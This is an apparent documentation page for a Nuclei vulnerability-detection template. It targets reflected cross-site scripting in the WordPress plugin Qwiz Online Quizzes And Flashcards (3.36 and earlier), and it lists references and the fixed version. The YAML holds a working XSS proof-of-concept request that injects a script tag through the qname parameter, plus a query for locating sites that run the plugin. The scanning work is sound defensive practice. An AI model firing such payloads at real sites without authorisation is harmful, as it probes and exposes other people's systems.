Qwiz Online Quizzes And Flashcards <= 3.36 - Cross-Site Scripting
ID: wp-qwiz-online-xss
Severity: medium
Author: r3Y3r53
Tags: wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards,xss
Description
Section titled “Description”The qname, i_qwiz, session_id and username parameters passed to the registration_complete.php file are affected by XSS issues.
YAML Source
Section titled “YAML Source”id: wp-qwiz-online-xss
info: name: Qwiz Online Quizzes And Flashcards <= 3.36 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | The qname, i_qwiz, session_id and username parameters passed to the registration_complete.php file are affected by XSS issues. remediation: Fixed in version 3.37 reference: - https://wpscan.com/vulnerability/d3c10f69-87b6-43fd-bcbc-c2d35b683ff4 - https://packetstormsecurity.com/files/154403/ - https://wordpress.org/plugins/qwiz-online-quizzes-and-flashcards/ metadata: verified: true max-request: 1 publicwww-query: "/wp-content/plugins/qwiz-online-quizzes-and-flashcards/" tags: wordpress,wp-plugin,wp,wpscan,packetstorm,qwiz-online-quizzes-and-flashcards,xss
http: - raw: - | GET /wp-content/plugins/qwiz-online-quizzes-and-flashcards/registration_complete.php?&qname=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_all(body, "quizzes/flashcard", "</script><script>alert(document.domain)</script>")' condition: and# digest: 490a004630440220479e0cd3add1c5b12a98428e8ac58d54c1528d477b999d954d00465f711cd5f9022049d5b70bda3f5b584e9b9be5c728c614fb42cd0b06df9fad9a1ee572522f9fe9:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/vulnerabilities/wordpress/wp-qwiz-online-xss.yaml"